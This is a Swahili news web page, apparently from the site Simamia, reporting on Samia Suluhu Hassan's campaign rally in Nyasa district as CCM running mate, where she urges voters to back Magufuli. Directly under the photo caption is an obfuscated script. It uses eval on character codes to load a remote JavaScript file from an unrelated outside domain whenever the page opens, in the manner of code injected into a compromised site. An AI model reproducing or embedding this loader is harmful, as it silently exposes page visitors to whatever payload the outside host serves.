<p>Mgombea Mwenza wa Urais kupitia CCM, Samia Hassan Suluhu akihutubia mkutano wa hadhara. </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
MGOMBEA Mwenza wa Chama Cha Mapinduzi (CCM), Samia Suluhu Hassan, amewaahidi wakazi wa wilaya ya Nyasa mkoani Ruvuma, kuwa endapo wataichagua CCM, itahakikisha inatatua changamoto zinazowakabili ikiwemo maji na umeme.
Pia, amewataka wananchi hao kupuuza vitisho wanavyopatiwa ili wasipige kura, kwa kuwa Serikali imejipanga kuwalinda. Alisema amepatiwa taarifa kuwa kuna baadhi ya wananchi wanatishwa ili wasipige kura ifikapo Oktoba, 25 mwaka huu katika uchaguzi mkuu.
âNaomba msiogope vitisho hivi jitokezeni kwa wingi kupiga kura, Serikali imejipanga kuwahakikishia usalama wenu,â alisema. Aidha, aliwataka waendelee kufanya kampeni kwa amani na utulivu na wasikubali mtu yeyote kuivunja na kuivuruga amani iliyopo iliyodumu kwa muda mrefu.
âNaomba muwe walinzi wa maeneo yenu ili mtu yeyote anayetaka kuivuruga amani yetu muweze kumdhibiti,â alisisitiza. Aliwataka wananchi hao kumchagua mgombea urais kwa tiketi ya CCM, Dk John Magufuli kwa kuwa ni kiongozi mwenye sifa ya uadilifu na mchapakazi.
Alisema Magufuli ni kiongozi asiye na mkono mrefu serikalini na amekuwa mfano kwa uadilifu na mchapakazi katika kazi na maeneo yote aliyopewa. Akizungumzia maendeleo ya wilaya hiyo ya Nyasa, alisema anatambua changamoto zinazokabili eneo hilo, ikiwemo ukosefu wa maji, umeme, miundombinu, madeni ya walimu na soko la mazao ya kahawa, karanga na mahindi.
Alisema Ilani ya Chama hicho ya mwaka huu, imebainisha kuwa kila kijiji kitapatiwa Sh milioni 50 ambazo wamepanga zitumike kuanzishia viwanda vidogo.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments